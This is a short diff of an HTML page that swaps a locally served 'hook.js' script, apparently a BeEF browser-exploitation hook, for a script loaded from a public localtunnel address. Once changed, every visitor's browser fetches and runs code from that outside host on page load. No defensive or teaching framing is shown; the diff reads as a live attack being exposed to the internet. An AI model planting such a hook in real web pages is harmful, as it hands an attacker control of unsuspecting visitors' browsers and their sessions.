--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title></title>
-    <script src="http://127.0.0.1:3000/hook.js"></script>
+    <script src="https://seven-hoops-draw.loca.lt"></script>
 </head>
 <body>
     <style>
